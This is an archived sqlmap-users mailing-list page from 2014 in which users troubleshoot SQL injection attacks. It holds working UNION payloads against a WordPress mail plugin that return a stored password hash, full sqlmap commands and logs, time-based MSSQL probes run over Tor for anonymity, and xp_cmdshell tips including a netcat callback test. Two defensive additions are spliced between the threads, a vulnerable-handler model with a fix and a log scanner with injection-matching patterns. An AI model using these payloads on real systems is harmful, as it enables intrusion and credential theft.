sqlmap-users Mailing List for sqlmap (Page 16)
Brought to you by:
inquisb
From: Brandon P. <bpe...@gm...> - 2014-12-15 17:46:14
Sorry, one more thing to note: the following command gets very close to exploiting the injection:

./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#" --union-char=f --prefix='in_deleted '

The only problem is that the union-char is 'f', when I was hoping it would be 0x66. When I capture the request and replace 'f' with 0x66, the injection works. Looks like ' is a bad char.

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Brandon P. <bpe...@gm...> - 2014-12-15 17:30:05
Playing with the queries sqlmap sends a bit more:

action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1

This results in a 0 being returned where the password hash was in the successful injection:

1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
        ^ injection result

action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1

This payload also results in a 0 being returned, not 'fdsa' as you would expect.

However, this payload does return 'fdsa':

action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#&mid=1

1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#[split]

Hope this helps.

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Brandon P. <bpe...@gm...> - 2014-12-15 17:01:26
Here is the console output. Attached is the traffic log in a zip:

bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt

    _
 ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|      |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:56:27

[08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
[08:56:27] [INFO] setting file for logging HTTP traffic
[08:56:27] [INFO] flushing session file
[08:56:27] [INFO] testing connection to the target URL
[08:56:27] [INFO] heuristics detected web page charset 'ascii'
[08:56:27] [INFO] testing if the target URL is stable. This can take a couple of seconds
[08:56:28] [INFO] target URL is stable
[08:56:28] [WARNING] heuristic (basic) test shows that POST parameter 'tray' might not be injectable
[08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
[08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:56:28] [WARNING] reflective value(s) found and filtering out
[08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)'
[08:58:08] [INFO] testing 'MySQL inline queries'
[08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:58:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:58:28] [INFO] target URL appears to be UNION injectable with 1 columns
[08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
[08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
[08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[08:58:54] [INFO] checking if the injection point on POST parameter 'tray' is a false positive
POST parameter 'tray' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 2049 HTTP(s) requests:
---
Parameter: tray (POST)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=getMailMessage&tray=in_deleted AND 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
---
[08:59:48] [INFO] testing MySQL
[08:59:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[08:59:51] [INFO] confirming MySQL
[08:59:53] [INFO] adjusting time delay to 1 second due to good response times
[08:59:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[08:59:53] [INFO] fetched data logged to text files under '/home/bperry/.sqlmap/output/172.31.16.26'

[*] shutting down at 08:59:53

bperry@ubuntu:~/tools/sqlmap$

On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> I don't see a reason why this form of UNION test would be any different than the regular used by sqlmap. Can you please send me the traffic file for such run (... --flush-session -t traffic.txt) along with console output?
>
> Bye
>
> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...> wrote:
>
>> Hello!
>>
>> Playing around with the following vulnerability:
>>
>> http://www.exploit-db.com/exploits/35505/
>>
>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does result in a response from the server with the hash of the first user:
>>
>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>
>> However, sqlmap only finds a time-based injection. Looking at sqlmap through burp, I do see sqlmap doesn't try an injection syntax like the one used in the PoC. It may be useful to add a syntax of UNION (SELECT CONCAT(blah, blah, blah) FROM blah).
>>
>> Just a thought!
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Miroslav S. <mir...@gm...> - 2014-12-15 16:54:56
Hi.

I don't see a reason why this form of UNION test would be any different than the regular used by sqlmap. Can you please send me the traffic file for such run (... --flush-session -t traffic.txt) along with console output?

Bye

On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...> wrote:
> Hello!
>
> Playing around with the following vulnerability:
>
> http://www.exploit-db.com/exploits/35505/
>
> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does result in a response from the server with the hash of the first user:
>
> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>
> However, sqlmap only finds a time based injection. Looking at sqlmap through burp, I do see sqlmap doesn't try an injection syntax like the one used in the PoC. It may be useful to add a syntax of UNION (SELECT CONCAT(blah, blah, blah) FROM blah).
>
> Just a thought!
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
From: Brandon P. <bpe...@gm...> - 2014-12-15 16:49:59
Hello!

Playing around with the following vulnerability:

http://www.exploit-db.com/exploits/35505/

Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does result in a response from the server with the hash of the first user:

1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]

However, sqlmap only finds a time based injection. Looking at sqlmap through burp, I do see sqlmap doesn't try an injection syntax like the one used in the PoC. It may be useful to add a syntax of UNION (SELECT CONCAT(blah, blah, blah) FROM blah).

Just a thought!

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
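Why a stock UNION test can miss this handler, and what actually closes the hole, as an added example that is not part of this thread or of sqlmap: a Python/sqlite3 model (constructed; sqlite stands in for MySQL, so the thread's `#` comment and `0x66...` hex literal are written as `--` and `'fdsa'`) of a handler that pastes the `tray` value into the query text and renders only the first row it gets back. With the original query matching exactly one row, which is what the responses in this thread suggest, a plain `UNION ALL SELECT` appends its row after the legitimate one and is never rendered, while a `LIMIT 1,1` offset discards the legitimate row and surfaces the injected one. The hardened handler uses an assumed allowlist (`ALLOWED_TRAYS`): a column name cannot be a bound parameter, so the allowlist is the control, and the rest of the query is static.

```python
import sqlite3

# Assumed allowlist of tray column names the handler may query on.
ALLOWED_TRAYS = {"in_inbox", "in_sent", "in_deleted"}

# Portable-SQL equivalents of the thread's MySQL payloads (constructed):
# the '#' comment becomes '--' and the 0x66647361 hex literal becomes 'fdsa'.
PAYLOAD_PLAIN = "in_deleted UNION ALL SELECT 'fdsa' --"
PAYLOAD_WITH_LIMIT = "in_deleted UNION ALL SELECT 'fdsa' LIMIT 1,1 --"


def make_db():
    """Constructed test database with exactly one message in the deleted tray,
    matching a run where the original query returns a single row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE messages (mid INTEGER, in_inbox INTEGER, "
        "in_sent INTEGER, in_deleted INTEGER, body TEXT)"
    )
    conn.execute("INSERT INTO messages VALUES (1, 0, 0, 1, 'legit message body')")
    return conn


def get_mail_message_vulnerable(conn, tray):
    """Assumed shape of the flawed handler: the tray name is spliced into the
    SQL text and only the first row of the result is rendered."""
    sql = f"SELECT body FROM messages WHERE {tray} = 1"
    rows = conn.execute(sql).fetchall()
    return rows[0][0] if rows else None


def get_mail_message_fixed(conn, tray):
    """Hardened handler: a column name cannot be a bound parameter, so it is
    checked against a fixed allowlist; everything else in the query is static."""
    if tray not in ALLOWED_TRAYS:
        raise ValueError(f"unknown tray {tray!r}")
    sql = f"SELECT body FROM messages WHERE {tray} = ?"
    rows = conn.execute(sql, (1,)).fetchall()
    return rows[0][0] if rows else None


def compare():
    """Run both handlers against a benign value and both payloads."""
    conn = make_db()
    results = {
        "vulnerable/benign": get_mail_message_vulnerable(conn, "in_deleted"),
        # Union row lands AFTER the legitimate row, so the first row is still legit.
        "vulnerable/plain union": get_mail_message_vulnerable(conn, PAYLOAD_PLAIN),
        # Offset 1 drops the legitimate row; the injected row is now the first one.
        "vulnerable/union+limit": get_mail_message_vulnerable(conn, PAYLOAD_WITH_LIMIT),
        "fixed/benign": get_mail_message_fixed(conn, "in_deleted"),
    }
    try:
        get_mail_message_fixed(conn, PAYLOAD_WITH_LIMIT)
        results["fixed/union+limit"] = "accepted"
    except ValueError:
        results["fixed/union+limit"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in compare().items():
        print(f"{name:24} -> {value}")
```

The same single-row property is why sqlmap's default UNION probes, which look for their marker anywhere in the response, never see it here: the marker is in a row the handler does not render. A handler that renders a single row is no safer than one that renders all of them; only the allowlist changes the outcome.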
From: hooshmand k <hoo...@gm...> - 2014-12-08 13:13:43
1) "waitfor delay '0:0:0'" makes no delay and "waitfor delay '0:0:5'" makes 5 seconds delay and so on.
2) I tried again with --tamper=between and sqlmap verified the vulnerability.
3) Using Tor in time-based techniques is not the best choice but I preferred to be anonymous in pentesting.

Best Regards

On Mon, Dec 8, 2014 at 2:38 PM, Miroslav Stampar <mir...@gm...> wrote:
> For sure it is. sqlmap gives you a huge nagging message in such case (network latency...blaballa).
>
> Bye
>
> On Mon, Dec 8, 2014 at 12:06 PM, Robin Wood <ro...@di...nja> wrote:
>> Wouldn't it be a bad idea trying to do a time based attack over Tor?
>>
>> Robin
>>
>> On 8 December 2014 at 11:00, Miroslav Stampar <mir...@gm...> wrote:
>>> Hi.
>>>
>>> 1) Shouldn't "waitfor delay '0:0:0'" make no delay?
>>> 2) sqlmap says "false positive or unexploitable injection point detected". Is there a possibility that the character > is filtered?
>>> 3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries to use in "false positive check" phase. Then you'll see what fails.
>>>
>>> Bye
>>>
>>> On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hoo...@gm...> wrote:
>>>> Hi,
>>>>
>>>> There is a website that is vulnerable to SQL injection. I have checked and I'm sure there is a blind SQL injection vulnerability but sqlmap could not find this.
>>>> I tried this command:
>>>> ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent --risk 3 --level 3 --technique=T --dbms="MsSQL"
>>>> and the output was something like this:
>>>> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable
>>>> [INFO] checking if the injection point on GET parameter 'search' is a false positive
>>>> [WARNING] false positive or unexploitable injection point detected
>>>> [WARNING] GET parameter 'search' is not injectable
>>>>
>>>> the "search" parameter is vulnerable to this payload: '); waitfor delay '0:0:0' --
>>>>
>>>> Did I make a mistake or did sqlmap not find that?
>>>>
>>>> Best Regards
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
http://about.me/hooshmand
Public Key <http://scriptics.ir/pub_key/hooshmand_pub.asc>
From: Miroslav S. <mir...@gm...> - 2014-12-08 11:08:46
For sure it is. sqlmap gives you a huge nagging message in such case (network latency...blaballa).

Bye

On Mon, Dec 8, 2014 at 12:06 PM, Robin Wood <ro...@di...nja> wrote:
> Wouldn't it be a bad idea trying to do a time based attack over Tor?
>
> Robin
>
> On 8 December 2014 at 11:00, Miroslav Stampar <mir...@gm...> wrote:
>> Hi.
>>
>> 1) Shouldn't "waitfor delay '0:0:0'" make no delay?
>> 2) sqlmap says "false positive or unexploitable injection point detected". Is there a possibility that the character > is filtered?
>> 3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries to use in "false positive check" phase. Then you'll see what fails.
>>
>> Bye
>>
>> On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hoo...@gm...> wrote:
>>> Hi,
>>>
>>> There is a website that is vulnerable to SQL injection. I have checked and I'm sure there is a blind SQL injection vulnerability but sqlmap could not find this.
>>> I tried this command:
>>> ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent --risk 3 --level 3 --technique=T --dbms="MsSQL"
>>> and the output was something like this:
>>> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable
>>> [INFO] checking if the injection point on GET parameter 'search' is a false positive
>>> [WARNING] false positive or unexploitable injection point detected
>>> [WARNING] GET parameter 'search' is not injectable
>>>
>>> the "search" parameter is vulnerable to this payload: '); waitfor delay '0:0:0' --
>>>
>>> Did I make a mistake or did sqlmap not find that?
>>>
>>> Best Regards
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
From: Robin W. <ro...@di...> - 2014-12-08 11:06:48
Wouldn't it be a bad idea trying to do a time based attack over Tor?

Robin

On 8 December 2014 at 11:00, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> 1) Shouldn't "waitfor delay '0:0:0'" make no delay?
> 2) sqlmap says "false positive or unexploitable injection point detected". Is there a possibility that the character > is filtered?
> 3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries to use in "false positive check" phase. Then you'll see what fails.
>
> Bye
>
> On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hoo...@gm...> wrote:
>> Hi,
>>
>> There is a website that is vulnerable to SQL injection. I have checked and I'm sure there is a blind SQL injection vulnerability but sqlmap could not find this.
>> I tried this command:
>> ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent --risk 3 --level 3 --technique=T --dbms="MsSQL"
>> and the output was something like this:
>> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable
>> [INFO] checking if the injection point on GET parameter 'search' is a false positive
>> [WARNING] false positive or unexploitable injection point detected
>> [WARNING] GET parameter 'search' is not injectable
>>
>> the "search" parameter is vulnerable to this payload: '); waitfor delay '0:0:0' --
>>
>> Did I make a mistake or did sqlmap not find that?
>>
>> Best Regards
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2014-12-08 11:01:03
Hi.

1) Shouldn't "waitfor delay '0:0:0'" make no delay?
2) sqlmap says "false positive or unexploitable injection point detected". Is there a possibility that the character > is filtered?
3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries to use in "false positive check" phase. Then you'll see what fails.

Bye

On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hoo...@gm...> wrote:
> Hi,
>
> There is a website that is vulnerable to SQL injection. I have checked and I'm sure there is a blind SQL injection vulnerability but sqlmap could not find this.
> I tried this command:
> ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent --risk 3 --level 3 --technique=T --dbms="MsSQL"
> and the output was something like this:
> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable
> [INFO] checking if the injection point on GET parameter 'search' is a false positive
> [WARNING] false positive or unexploitable injection point detected
> [WARNING] GET parameter 'search' is not injectable
>
> the "search" parameter is vulnerable to this payload: '); waitfor delay '0:0:0' --
>
> Did I make a mistake or did sqlmap not find that?
>
> Best Regards

--
Miroslav Stampar
http://about.me/stamparm
From: hooshmand k <hoo...@gm...> - 2014-12-08 10:52:35
Hi,

There is a website that is vulnerable to SQL injection. I have checked and I'm sure there is a blind SQL injection vulnerability but sqlmap could not find this.
I tried this command:
./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent --risk 3 --level 3 --technique=T --dbms="MsSQL"
and the output was something like this:
[INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable
[INFO] checking if the injection point on GET parameter 'search' is a false positive
[WARNING] false positive or unexploitable injection point detected
[WARNING] GET parameter 'search' is not injectable

the "search" parameter is vulnerable to this payload: '); waitfor delay '0:0:0' --

Did I make a mistake or did sqlmap not find that?

Best Regards
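From the receiving end, an added example (not from this thread or from sqlmap) of what the probes discussed here look like in a web server log and how to pick them out: a small Python scanner over a constructed Apache-style access log with a trailing response-time column in milliseconds (hosts, paths, timings and the `/mail/ajax.php` path are made up). It keys on the payload grammar seen in this thread and the MySQL one above (`WAITFOR DELAY`, `BENCHMARK(`, `UNION ... SELECT`, a `LIMIT n,n` offset followed by a comment), on sqlmap's default `sqlmap/` User-Agent, and on response time, which is the only signal left for a POST parameter because access logs do not carry request bodies. Two caveats from the thread itself: `--random-agent`, as used in the command above, removes the User-Agent signal entirely, and the `'0:0:0'` control probe has the same grammar as the real one but causes no delay, so grammar and timing have to be read together.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log excerpt: Apache "combined" format plus a trailing
# response-time column in milliseconds (Apache's %D logs microseconds; the
# value is assumed to be converted already). Hosts, paths and times are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Dec/2014:11:51:02 +0000] "GET /search.php?search=%27%29%3B+waitfor+delay+%270%3A0%3A5%27+-- HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)" 5021
10.0.0.5 - - [08/Dec/2014:11:51:08 +0000] "GET /search.php?search=%27%29%3B+waitfor+delay+%270%3A0%3A0%27+-- HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)" 38
10.0.0.9 - - [15/Dec/2014:08:58:26 +0000] "POST /mail/ajax.php HTTP/1.1" 200 88 "-" "sqlmap/1.0-dev (http://sqlmap.org)" 5102
10.0.0.9 - - [15/Dec/2014:08:58:40 +0000] "GET /index.php?id=1+UNION+ALL+SELECT+NULL%23 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1)" 41
10.0.0.9 - - [15/Dec/2014:08:58:41 +0000] "GET /index.php?id=1+UNION+ALL+SELECT+%27x%27+LIMIT+1%2C1%23 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1)" 40
10.0.0.3 - - [15/Dec/2014:09:00:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Macintosh)" 35
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<ms>\d+)$'
)

# Grammar of the payloads that appear in this thread and the MySQL one above.
PAYLOAD_PATTERNS = {
    "mssql-waitfor": re.compile(r"waitfor\s+delay\s*'", re.I),
    "mysql-benchmark": re.compile(r"benchmark\s*\(\s*\d+\s*,", re.I),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "limit-offset-suffix": re.compile(r"\blimit\s+\d+\s*,\s*\d+\s*(#|--)", re.I),
}


def scan_access_log(text, slow_ms=4000):
    """Return one finding per suspicious request: a decoded query string that
    matches a payload pattern, a sqlmap default User-Agent, or a response
    slower than slow_ms (the only signal for POST bodies, which are not logged)."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        parts = urlsplit(m["target"])
        query = unquote_plus(parts.query)  # decode %xx and '+' before matching
        tags = [name for name, rx in PAYLOAD_PATTERNS.items() if rx.search(query)]
        if m["ua"].startswith("sqlmap/"):
            tags.append("sqlmap-ua")
        slow = int(m["ms"]) >= slow_ms
        if tags or slow:
            findings.append({
                "ip": m["ip"], "method": m["method"], "path": parts.path,
                "tags": tags, "response_ms": int(m["ms"]), "slow": slow,
            })
    return findings


def by_source(findings):
    """Count findings per client address; bursts from one address are the usual shape."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']:10} {f['method']:4} {f['path']:18} {f['response_ms']:5}ms "
              f"{'SLOW ' if f['slow'] else '     '}{','.join(f['tags'])}")
    print(by_source(found))
```

The POST line is the interesting one: nothing in the access log shows the `tray` payload, and the default User-Agent is the only grammar-level clue, so without the timing column (or request-body logging at the application layer) that probe would be invisible.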
From: Brandon P. <bpe...@gm...> - 2014-12-07 20:12:34
Open up a netcat listener and make xp_cmdshell telnet into it as a test.

On Sunday, December 7, 2014, Rodrigo Zanatta Silva <rod...@gm...> wrote:
> Yeah... but... What I did makes sense? I tested and for any value it only delays for the else value.
>
> I can't read any file until now. Everything I did failed.
>
> Is there another way to check if the xp_cmdshell is really working? I am out of ideas now.
>
> 2014-12-07 17:32 GMT-02:00 Miroslav Stampar <mir...@gm...>:
>> You have to redirect output to an output file and read it afterwards. xp_cmdshell by itself doesn't return anything other than the return code.
>>
>> Bye
>>
>> On Dec 7, 2014 8:31 PM, "Rodrigo Zanatta Silva" <rod...@gm...> wrote:
>>> You don't need just to have it activated? You say I can't run the EXEC? Any other way to avoid it?
>>>
>>> Is there anything I can do? Humm. It comes to mind to impersonate another user and pray they can do this.
>>>
>>> 2014-12-07 17:25 GMT-02:00 Miroslav Stampar <mir...@gm...>:
>>>> No execution rights?
>>>>
>>>> Bye
>>>>
>>>> On Dec 7, 2014 6:19 PM, "Rodrigo Zanatta Silva" <rod...@gm...> wrote:
>>>>> Hi. I am doing a pen test on Microsoft SQL Server 2008 R2 and I can see that xp_cmdshell is active.
>>>>>
>>>>> In the table *master.sys.configurations*, the column *value_in_use* shows it is 1, so it is active!! But every command that I tried to use didn't return any value. I just tried the most obvious:
>>>>>
>>>>> DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result = 0) WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'
>>>>>
>>>>> But it just waits 5 seconds. Any idea why this happens?

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Rodrigo Z. S. <rod...@gm...> - 2014-12-07 19:54:30
Yeah... but... What I did makes sense? I tested and for any value it only delays for the else value.

I can't read any file until now. Everything I did failed.

Is there another way to check if the xp_cmdshell is really working? I am out of ideas now.

2014-12-07 17:32 GMT-02:00 Miroslav Stampar <mir...@gm...>:
> You have to redirect output to an output file and read it afterwards. xp_cmdshell by itself doesn't return anything other than the return code.
>
> Bye
>
> On Dec 7, 2014 8:31 PM, "Rodrigo Zanatta Silva" <rod...@gm...> wrote:
>> You don't need just to have it activated? You say I can't run the EXEC? Any other way to avoid it?
>>
>> Is there anything I can do? Humm. It comes to mind to impersonate another user and pray they can do this.
>>
>> 2014-12-07 17:25 GMT-02:00 Miroslav Stampar <mir...@gm...>:
>>> No execution rights?
>>>
>>> Bye
>>>
>>> On Dec 7, 2014 6:19 PM, "Rodrigo Zanatta Silva" <rod...@gm...> wrote:
>>>> Hi. I am doing a pen test on Microsoft SQL Server 2008 R2 and I can see that xp_cmdshell is active.
>>>>
>>>> In the table *master.sys.configurations*, the column *value_in_use* shows it is 1, so it is active!! But every command that I tried to use didn't return any value. I just tried the most obvious:
>>>>
